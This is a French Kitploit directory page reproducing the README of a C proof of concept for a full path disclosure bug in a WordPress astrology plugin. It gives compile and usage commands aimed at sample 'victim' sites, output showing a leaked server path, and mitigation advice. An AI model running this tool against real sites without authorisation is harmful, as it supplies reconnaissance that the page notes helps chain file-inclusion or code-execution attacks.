Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/bytereaper77/cve-2025-6082
ReconnaissanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionArchived
GitHubbytereaper77/cve-2025-6082

CVE-2025-6082

Preuve de concept exploitant le bug de divulgation de chemin complet dans le plugin WordPress « Birth Chart Compatibility » (<=v2.0)

Voir le dépôt
1il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
CVE-2025-6082 — Preuve de concept exploitant le bug de divulgation de chemin complet dans le plugin WordPress « Birth Chart Compatibility » (<=v2.0) | Kitploit
Partager

Preuve de concept de divulgation de chemin complet CVE-2025-6082

Auteur: Byte Reaper
Telegram: @ByteReaper0
CVE: CVE-2025-6082
Vulnérabilité: Divulgation de chemin complet (CWE-200)

Description

Cette preuve de concept exploite un bug de divulgation de chemin complet dans le plugin WordPress Birth Chart Compatibility (versions ≤ 2.0). Le POC envoie une requête HTTP GET au point de terminaison index.php du plugin, capture toute alerte PHP ou erreur fatale, et extrait le chemin du système de fichiers du serveur (par ex. /var/www/html/wp-content/plugins/... ou C:\xampp\htdocs\...).
Révéler le chemin complet aide un attaquant à enchaîner d'autres attaques d'inclusion de fichier local (LFI), d'exécution de code à distance (RCE) ou de reconnaissance.

Prérequis

  • Linux
  • gcc ou un compilateur C compatible
  • en-têtes de développement libcurl
  • argparse.c / argparse.h

Compilation

root@kitploit:~
gcc -o fpd-poc exploit.c argparse.c  -lcurl

Utilisation

./fpd-poc -u https://target.com [options]

Options :

Flag Description

-u, --url (Obligatoire) URL de base du site WordPress cible

-c, --cookies Utiliser les cookies du fichier (facultatif)

-v, --verbose Activer la sortie détaillée de curl

-f, --boucle Répéter la requête N fois (ex. -f 10)

-h, --help Afficher ce message d'aide

Exemple :

Single check

./fpd-poc -u https://victim.com

Verbose mode with 5 repeated checks

./fpd-poc -u https://victim.com -v -f 5 Exemple de sortie :

[+] Requête envoyée avec succès

[+] URL d'entrée : https://victim.com

[+] URL complète formatée : https://victim.com/wp-content/plugins/birth-chart-compatibility/index.php

[+] Code HTTP : 200

====================================[Réponse]====================================

Warning: include(/var/www/html/wp-content/plugins/birth-chart-compatibility/missing.php): failed to open stream...

[+] Longueur de la réponse : 256

[+] Mot-clé trouvé : Warning:

[+] Contexte : Warning: include(/var/www/html/wp-content/plugins/birth-chart-compatibility/missing.php

Atténuation

Mettez à jour le plugin « Birth Chart Compatibility » vers une version corrigée (> 2.0) dès qu'elle est publiée.

Désactivez ou supprimez le plugin si vous ne l'utilisez pas.

Refusez l'accès direct aux fichiers PHP du plugin (index.php) via la configuration de votre serveur web (par ex. via des règles .htaccess ou Nginx).

Avertissement Ce code est fourni à des fins éducatives et de test uniquement. Toute utilisation non autorisée contre des systèmes dont vous n'êtes pas propriétaire ou pour lesquels vous n'avez pas l'autorisation explicite de tester peut être illégale.

Télécharger l’outil